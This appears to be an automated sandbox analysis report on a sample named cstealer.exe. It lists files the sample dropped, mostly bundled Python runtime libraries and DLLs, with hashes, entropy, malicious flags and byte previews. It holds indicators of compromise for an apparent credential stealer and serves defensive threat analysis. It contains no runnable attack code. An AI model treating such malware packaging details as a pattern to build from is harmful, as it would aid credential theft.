                                                                                                                                                          SSDEEP:6144:3JhhPXoWcz5HvcQpq9Sr9pmHboiYE9qWM53pLW1AmXYWtmVS9G:fNXoWcznq9Sr9pyKFh6eS9G
                                                                                                                                                          MD5:D47E6ACF09EAD5774D5B471AB3AB96FF
                                                                                                                                                          SHA1:64CE9B5D5F07395935DF95D4A0F06760319224A2
                                                                                                                                                          SHA-256:D0DF57988A74ACD50B2D261E8B5F2C25DA7B940EC2AAFBEE444C277552421E6E
                                                                                                                                                          SHA-512:52E132CE94F21FA253FED4CF1F67E8D4423D8C30224F961296EE9F64E2C9F4F7064D4C8405CD3BB67D3CF880FE4C21AB202FA8CF677E3B4DAD1BE6929DBDA4E2
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\F1S.'_..'_..'_.._...'_..\^..'_..\Z..'_..\[..'_..\\..'_..\^..'_..U^..'_..'^..'_..\\..'_..\R..'_..\_..'_..\...'_..\]..'_.Rich.'_.................PE..d...k.Vc.........." ...!.v...<......|...............................................o.....`..........................................T..P....T..................H'......x)......P.......T...........................P...@............................................text...)u.......v.................. ..`.rdata...............z..............@..@.data....*...p...$...R..............@....pdata..H'.......(...v..............@..@.rsrc...............................@..@.reloc..P...........................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\_hashlib.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):63872
                                                                                                                                                          Entropy (8bit):6.166853300594844
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:18njpHxGkYjEEEJkn8cw6ThID5IJt7SyiPx:GnjpHxRJ8w6ThID5IJtEx
                                                                                                                                                          MD5:DE4D104EA13B70C093B07219D2EFF6CB
                                                                                                                                                          SHA1:83DAF591C049F977879E5114C5FEA9BBBFA0AD7B
                                                                                                                                                          SHA-256:39BC615842A176DB72D4E0558F3CDCAE23AB0623AD132F815D21DCFBFD4B110E
                                                                                                                                                          SHA-512:567F703C2E45F13C6107D767597DBA762DC5CAA86024C87E7B28DF2D6C77CD06D3F1F97EED45E6EF127D5346679FEA89AC4DC2C453CE366B6233C0FA68D82692
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A.g...g...g.......g..V....g..V....g..V....g..V....g..X....g.......g.......g...g..Qg..X....g..X....g..X.l..g..X....g..Rich.g..........................PE..d...u.Vc.........." ...!.T...~......@?....................................................`.............................................P.......................,........)......\...0}..T............................{..@............p..(............................text...YR.......T.................. ..`.rdata...N...p...P...X..............@..@.data...8...........................@....pdata..,...........................@..@.rsrc...............................@..@.reloc..\...........................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\_lzma.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):158080
                                                                                                                                                          Entropy (8bit):6.835761878596918
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:5mGf4k8d79MwyHiRr7tznf49mNoaGjQJplJIDe10Yhx:5Pf4FhMwyMAYOao6P
                                                                                                                                                          MD5:337B0E65A856568778E25660F77BC80A
                                                                                                                                                          SHA1:4D9E921FEAEE5FA70181EBA99054FFA7B6C9BB3F
                                                                                                                                                          SHA-256:613DE58E4A9A80EFF8F8BC45C350A6EAEBF89F85FFD2D7E3B0B266BF0888A60A
                                                                                                                                                          SHA-512:19E6DA02D9D25CCEF06C843B9F429E6B598667270631FEBE99A0D12FC12D5DA4FB242973A8351D3BF169F60D2E17FE821AD692038C793CE69DFB66A42211398E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........X...6D..6D..6D..D..6D@.7E..6D@.3E..6D@.2E..6D@.5E..6DN.7E..6D..7E..6D..7D..6DN.;E..6DN.6E..6DN..D..6DN.4E..6DRich..6D........PE..d...~.Vc.........." ...!.d...........8..............................................O.....`..........................................%..L...\%..x....p.......P.......@...)......8.......T...........................p...@............................................text...~c.......d.................. ..`.rdata..............h..............@..@.data........@......................@....pdata.......P....... ..............@..@.rsrc........p.......4..............@..@.reloc..8............>..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\_queue.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):31104
                                                                                                                                                          Entropy (8bit):6.35436407327013
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:cQuCvO+MZFryl9SDCg6rXv5mkWsnTBq9ID7UJIYiSy1pCQYIPxh8E9VF0Nyb9:cl+yFp6rXRmk5s9ID7UeYiSyv7PxWER
                                                                                                                                                          MD5:FF8300999335C939FCCE94F2E7F039C0
                                                                                                                                                          SHA1:4FF3A7A9D9CA005B5659B55D8CD064D2EB708B1A
                                                                                                                                                          SHA-256:2F71046891BA279B00B70EB031FE90B379DBE84559CF49CE5D1297EA6BF47A78
                                                                                                                                                          SHA-512:F29B1FD6F52130D69C8BD21A72A71841BF67D54B216FEBCD4E526E81B499B9B48831BB7CDFF0BFF6878AAB542CA05D6326B8A293F2FB4DD95058461C0FD14017
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........MX..#...#...#.......#..."...#...&...#...'...#... ...#..."...#.Q."...#..."...#.......#...#...#.......#...!...#.Rich..#.........................PE..d...d.Vc.........." ...!.....8.......................................................K....`..........................................C..L....C..d....p.......`.......P...)..........p4..T...........................03..@............0..0............................text............................... ..`.rdata..R....0......................@..@.data...x....P.......<..............@....pdata.......`.......@..............@..@.rsrc........p.......D..............@..@.reloc...............N..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\_socket.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):78200
                                                                                                                                                          Entropy (8bit):6.239347454910878
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:HJlcAdpEVuju9/s+S+pJGQRivVia3i9IDQw17Sy+Px3sxi:H7ce+uju9/sT+pJGdvVp3i9IDQw1kxZ
                                                                                                                                                          MD5:8140BDC5803A4893509F0E39B67158CE
                                                                                                                                                          SHA1:653CC1C82BA6240B0186623724AEC3287E9BC232
                                                                                                                                                          SHA-256:39715EF8D043354F0AB15F62878530A38518FB6192BC48DA6A098498E8D35769
                                                                                                                                                          SHA-512:D0878FEE92E555B15E9F01CE39CFDC3D6122B41CE00EC3A4A7F0F661619F83EC520DCA41E35A1E15650FB34AD238974FE8019577C42CA460DDE76E3891B0E826
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................*.......*.......*.......*.......$...............y.......$.......$.......$.......$.......Rich............................PE..d...s.Vc.........." ...!.l...........%.......................................P......h.....`.........................................@...P............0....... ..x.......x)...@..........T...............................@............................................text....k.......l.................. ..`.rdata..Dt.......v...p..............@..@.data...............................@....pdata..x.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\_sqlite3.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):118656
                                                                                                                                                          Entropy (8bit):6.2256831065058815
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:fArVnbGK9SGnh8u6rqMD6ciFCrl14zZvV9NdJRvdO5yt6sqM7VjEP/OsYpxtXr9T:YrVSK9SGnh8u6ESx5CVQP/yXZ
                                                                                                                                                          MD5:D4324D1E8DB7FCF220C5C541FECCE7E3
                                                                                                                                                          SHA1:1CAF5B23AE47F36D797BC6BDD5B75B2488903813
                                                                                                                                                          SHA-256:DDBED9D48B17C54FD3005F5A868DD63CB8F3EFE2C22C1821CEBB2FE72836E446
                                                                                                                                                          SHA-512:71D56D59E019CF42CEA88203D9C6E50F870CD5C4D5C46991ACBFF3AB9FF13F78D5DBF5D1C2112498FC7E279D41EE27DB279B74B4C08A60BB4098F9E8C296B5D8
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......pU..44..44..44..=Ls.04...O.64...O..54...O.94...O.<4...O.74...O.14...F.64..44.15...O.=4...O..54...O..54...O.54..Rich44..........................PE..d.....Vc.........." ...!............ ....................................................`..........................................Z..P....Z...........................)..............T...........................p...@............................................text............................... ..`.rdata..\...........................@..@.data................n..............@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\_ssl.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):159616
                                                                                                                                                          Entropy (8bit):5.9948013841482926
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3072:qFrIQQey4VWR98w/PQQcXo8uOVrGxn+SQOXLkd1ItS+Q8YuAfxJIDt75EHx:eEeRV29//4QcJuOynyvxX
                                                                                                                                                          MD5:069BCCC9F31F57616E88C92650589BDD
                                                                                                                                                          SHA1:050FC5CCD92AF4FBB3047BE40202D062F9958E57
                                                                                                                                                          SHA-256:CB42E8598E3FA53EEEBF63F2AF1730B9EC64614BDA276AB2CD1F1C196B3D7E32
                                                                                                                                                          SHA-512:0E5513FBE42987C658DBA13DA737C547FF0B8006AECF538C2F5CF731C54DE83E26889BE62E5C8A10D2C91D5ADA4D64015B640DAB13130039A5A8A5AB33A723DC
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B3"..RL,.RL,.RL,.*.,.RL,.)M-.RL,.)I-.RL,.)H-.RL,.)O-.RL,.)M-.RL,b(M-.RL,.RM,.SL,. M-.RL,.)A-.RL,.)L-.RL,.).,.RL,.)N-.RL,Rich.RL,........................PE..d.....Vc.........." ...!............l+....................................................`.............................................d............`.......P.......F...)...p..4... ...T...............................@...............x............................text............................... ..`.rdata..............................@..@.data....j.......f..................@....pdata.......P......."..............@..@.rsrc........`......................@..@.reloc..4....p.......8..............@..B........................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\base_library.zip

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1439447
                                                                                                                                                          Entropy (8bit):5.58639468240011
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:6QRqL5TPAxNWlUKdcubgAnj90H0AWfh7dYMbP/Medfw:6QRqL2xNbeA
                                                                                                                                                          MD5:83D235E1F5B0EE5B0282B5AB7244F6C4
                                                                                                                                                          SHA1:629A1CE71314D7ABBCE96674A1DDF9F38C4A5E9C
                                                                                                                                                          SHA-256:DB389A9E14BFAC6EE5CCE17D41F9637D3FF8B702CC74102DB8643E78659670A0
                                                                                                                                                          SHA-512:77364AFF24CFC75EE32E50973B7D589B4A896D634305D965ECBC31A9E0097E270499DBEC93126092EB11F3F1AD97692DB6CA5927D3D02F3D053336D6267D7E5F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:PK..........!. ..y............_collections_abc.pyc............................................d.Z.d.d.l.m.Z.m.Z...d.d.l.Z...e.e.e.........................Z...e.d...............Z.d...Z...e.e...............Z.[.g.d...Z.d.Z...e...e.d.............................Z...e...e...e...........................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.i.................................................................Z...e...e.g.............................Z...e...e...e.g...........................................Z...e...e...e.d...........................................Z...e...e...e.d.d.z.............................................Z...e...e...e...........................................Z...e...e.d.............................Z ..e...e.d.............................Z!..e...e...e"..........................................Z#..e.i.......................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\certifi\cacert.pem

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:ASCII text
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):292541
                                                                                                                                                          Entropy (8bit):6.048162209044241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/Q5MSRqNb7d8iu5NF:QWb/TRJLWURrI55MWavdF0D
                                                                                                                                                          MD5:D3E74C9D33719C8AB162BAA4AE743B27
                                                                                                                                                          SHA1:EE32F2CCD4BC56CA68441A02BF33E32DC6205C2B
                                                                                                                                                          SHA-256:7A347CA8FEF6E29F82B6E4785355A6635C17FA755E0940F65F15AA8FC7BD7F92
                                                                                                                                                          SHA-512:E0FB35D6901A6DEBBF48A0655E2AA1040700EB5166E732AE2617E89EF5E6869E8DDD5C7875FA83F31D447D4ABC3DB14BFFD29600C9AF725D9B03F03363469B4C
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\charset_normalizer\md.cp311-win_amd64.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10752
                                                                                                                                                          Entropy (8bit):4.673454313041419
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:KG+p72HzA5iJGhU2Y0hQMsQJCUCLsZEA4elh3XQMtCFliHUWQcX6g8cim1qeSju1:A2HzzU2bRYoeLHkcqgvimoe
                                                                                                                                                          MD5:723EC2E1404AE1047C3EF860B9840C29
                                                                                                                                                          SHA1:8FC869B92863FB6D2758019DD01EDBEF2A9A100A
                                                                                                                                                          SHA-256:790A11AA270523C2EFA6021CE4F994C3C5A67E8EAAAF02074D5308420B68BD94
                                                                                                                                                          SHA-512:2E323AE5B816ADDE7AAA14398F1FDB3EFE15A19DF3735A604A7DB6CADC22B753046EAB242E0F1FBCD3310A8FBB59FF49865827D242BAF21F44FD994C3AC9A878
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B..............................M....................................... ...?.......?.......?.a.....?.......Rich............................PE..d...siAe.........." ...%.....................................................p............`..........................................'..p...`(..d....P.......@...............`..,...`#.............................. "..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...8....0......."..............@....pdata.......@.......$..............@..@.rsrc........P.......&..............@..@.reloc..,....`.......(..............@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\charset_normalizer\md__mypyc.cp311-win_amd64.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):119296
                                                                                                                                                          Entropy (8bit):5.872097486056729
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:OzgMw0g+m/+rxC9Jtd960WsCyqPD1/bZMlDML48Be9zGTVmZRJIRbvB:OsTH+VC9Jtd9VdCr7fMp/8yGTVmzmZ
                                                                                                                                                          MD5:9EA8098D31ADB0F9D928759BDCA39819
                                                                                                                                                          SHA1:E309C85C1C8E6CE049EEA1F39BEE654B9F98D7C5
                                                                                                                                                          SHA-256:3D9893AA79EFD13D81FCD614E9EF5FB6AAD90569BEEDED5112DE5ED5AC3CF753
                                                                                                                                                          SHA-512:86AF770F61C94DFBF074BCC4B11932BBA2511CAA83C223780112BDA4FFB7986270DC2649D4D3EA78614DBCE6F7468C8983A34966FC3F2DE53055AC6B5059A707
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..r...r...r......r...s...r...s...r...w...r...v..r...q...r.#.s...r...s...r..8z...r..8r...r..8....r..8p...r.Rich..r.........................PE..d...siAe.........." ...%.*..........0........................................ ............`.........................................p...d..........................................Px...............................w..@............@...............................text...X).......*.................. ..`.rdata...X...@...Z..................@..@.data...8=.......0..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\libcrypto-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3441504
                                                                                                                                                          Entropy (8bit):6.097985120800337
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:49152:8TKuk2CQIU6iV9OjPWgBqIVRIaEv5LY/RnQ2ETEvrPnkbsYNPsNwsML1CPwDv3u6:Vv+KRi5KsEKsY+NwsG1CPwDv3uFfJu
                                                                                                                                                          MD5:6F4B8EB45A965372156086201207C81F
                                                                                                                                                          SHA1:8278F9539463F0A45009287F0516098CB7A15406
                                                                                                                                                          SHA-256:976CE72EFD0A8AEEB6E21AD441AA9138434314EA07F777432205947CDB149541
                                                                                                                                                          SHA-512:2C5C54842ABA9C82FB9E7594AE9E264AC3CBDC2CC1CD22263E9D77479B93636799D0F28235AC79937070E40B04A097C3EA3B7E0CD4376A95ED8CA90245B7891F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a...2...2...2...2...2..3...2..3...2..3...2..3...2...2...2L.3...2..3...2..3.2..3...2..p2...2..3...2Rich...2........................PE..d...m..b.........." ... ..$...................................................4....../5...`..........................................h/..h...*4.@....`4.|....`2.....Z4.`)...p4..O....,.8...........................`.,.@............ 4..............................text.....$.......$................. ..`.rdata........$.......$.............@..@.data...!z....1..,....1.............@....pdata.......`2.......1.............@..@.idata..^#... 4..$....3.............@..@.00cfg..u....P4.......3.............@..@.rsrc...|....`4.......3.............@..@.reloc...x...p4..z....3.............@..B................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\libffi-8.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):35064
                                                                                                                                                          Entropy (8bit):6.362215445656998
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:SB8J4ihYfwYiXGPc9orPji8i4DDQWvGaRQsTeCXS/Fzc7jsFruRXYV1ZE9DRCXjQ:rGHs4vpegQsTT0uj82S7Fp2DG4yshH
                                                                                                                                                          MD5:32D36D2B0719DB2B739AF803C5E1C2F5
                                                                                                                                                          SHA1:023C4F1159A2A05420F68DAF939B9AC2B04AB082
                                                                                                                                                          SHA-256:128A583E821E52B595EB4B3DDA17697D3CA456EE72945F7ECCE48EDEDAD0E93C
                                                                                                                                                          SHA-512:A0A68CFC2F96CB1AFD29DB185C940E9838B6D097D2591B0A2E66830DD500E8B9538D170125A00EE8C22B8251181B73518B73DE94BEEEDD421D3E888564A111C1
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X................d.....N...................5...N......N......N....................................Rich............................PE..d....$(a.........." .....H...*.......L..............................................4.....`..........................................l.......o..P...............8....l..........(....b...............................c..8............`.. ............................text....G.......H.................. ..`.rdata..X....`.......L..............@..@.data................b..............@....pdata..8............d..............@..@.reloc..(............j..............@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\libssl-1_1.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):702816
                                                                                                                                                          Entropy (8bit):5.547832370836076
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:UUnBMlBGdU/t0voUYHgqRJd7a7+JLvrfX7bOI8Fp0D6WuHU2lvzR:UN/t0vMnffOI8Fp0D6TU2lvzR
                                                                                                                                                          MD5:8769ADAFCA3A6FC6EF26F01FD31AFA84
                                                                                                                                                          SHA1:38BAEF74BDD2E941CCD321F91BFD49DACC6A3CB6
                                                                                                                                                          SHA-256:2AEBB73530D21A2273692A5A3D57235B770DAF1C35F60C74E01754A5DAC05071
                                                                                                                                                          SHA-512:FAC22F1A2FFBFB4789BDEED476C8DAF42547D40EFE3E11B41FADBC4445BB7CA77675A31B5337DF55FDEB4D2739E0FB2CBCAC2FEABFD4CD48201F8AE50A9BD90B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.p*..p*..p*......p*...+..p*.\.+..p*.../..p*......p*...)..p*...+..p*..p+.iq*......p*...*..p*.....p*...(..p*.Rich.p*.........PE..d......b.........." ... .B...T......<.....................................................`.........................................@A...N..@U..........s........M......`)......h...0...8...............................@............@..@............................text....@.......B.................. ..`.rdata..J/...`...0...F..............@..@.data...AM.......D...v..............@....pdata...V.......X..................@..@.idata..%W...@...X..................@..@.00cfg..u............j..............@..@.rsrc...s............l..............@..@.reloc..l............t..............@..B................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\python311.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):5758328
                                                                                                                                                          Entropy (8bit):6.089726305084683
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:98304:JdHwQkq3AAtsPv3XXTVEspHBMp4SsPxQpe2bx:JdHwQkq3AMsPvHXSpAxQpe2V
                                                                                                                                                          MD5:9A24C8C35E4AC4B1597124C1DCBEBE0F
                                                                                                                                                          SHA1:F59782A4923A30118B97E01A7F8DB69B92D8382A
                                                                                                                                                          SHA-256:A0CF640E756875C25C12B4A38BA5F2772E8E512036E2AC59EB8567BF05FFBFB7
                                                                                                                                                          SHA-512:9D9336BF1F0D3BC9CE4A636A5F4E52C5F9487F51F00614FC4A34854A315CE7EA8BE328153812DBD67C45C75001818FA63317EBA15A6C9A024FA9F2CAB163165B
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ih.-...-...-...r../...r@.#...r..!...r..%...r..)...$q..7....{..&...-...H...r......r..,...rB.,...r..,...Rich-...........PE..d...R.Vc.........." ...!.T%..,7......K........................................\......~X...`.........................................P.@......NA......`[.......V../....W.x)...p[..B....).T...........................P.).@............p%..............................text...BS%......T%................. ..`.rdata..0....p%......X%.............@..@.data.........A..N...\A.............@....pdata.../....V..0....Q.............@..@PyRuntim......X.......S.............@....rsrc........`[......fV.............@..@.reloc...B...p[..D...pV.............@..B........................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\select.pyd

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):29056
                                                                                                                                                          Entropy (8bit):6.49468173344972
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:5oR1ecReJKwHqUuI7A70RUZ9ID7GvIYiSy1pCQlIJNPxh8E9VF0NyUT2:ezeUeJlHqybG9ID7GQYiSyvCPxWEC
                                                                                                                                                          MD5:97EE623F1217A7B4B7DE5769B7B665D6
                                                                                                                                                          SHA1:95B918F3F4C057FB9C878C8CC5E502C0BD9E54C0
                                                                                                                                                          SHA-256:0046EB32F873CDE62CF29AF02687B1DD43154E9FD10E0AA3D8353D3DEBB38790
                                                                                                                                                          SHA-512:20EDC7EAE5C0709AF5C792F04A8A633D416DA5A38FC69BD0409AFE40B7FB1AFA526DE6FE25D8543ECE9EA44FD6BAA04A9D316AC71212AE9638BDEF768E661E0F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.t^_f'^_f'^_f'W'.'\_f'.$g&\_f'.$c&R_f'.$b&V_f'.$e&Z_f'.$g&\_f'^_g'._f'.-g&[_f'.$k&__f'.$f&__f'.$.'__f'.$d&__f'Rich^_f'........PE..d...e.Vc.........." ...!.....2............................................................`..........................................@..L...,A..x....p.......`.......H...)......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B................................................................................................................................................................................................................................................

                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI77882\sqlite3.dll

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\cstealer.exe
                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1481088
                                                                                                                                                          Entropy (8bit):6.569811736013214
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:GjhOK/D8n/vDz5YZ/9T6F2MkEvTPdZklaOPSwfzDJ8CVjBx+Xt4V9zQXeRxd:IX/CDzGZ1T01TPPk76oDJ8qKXavzQOR
                                                                                                                                                          MD5:AC633A9EB00F3B165DA1181A88BB2BDA
                                                                                                                                                          SHA1:D8C058A4F873FAA6D983E9A5A73A218426EA2E16
                                                                                                                                                          SHA-256:8D58DB3067899C997C2DB13BAF13CD4136F3072874B3CA1F375937E37E33D800
                                                                                                                                                          SHA-512:4BF6A3AAFF66AE9BF6BC8E0DCD77B685F68532B05D8F4D18AAA7636743712BE65AB7565C9A5C513D5EB476118239FB648084E18B4EF1A123528947E68BD00A97
                                                                                                                                                          Malicious:true
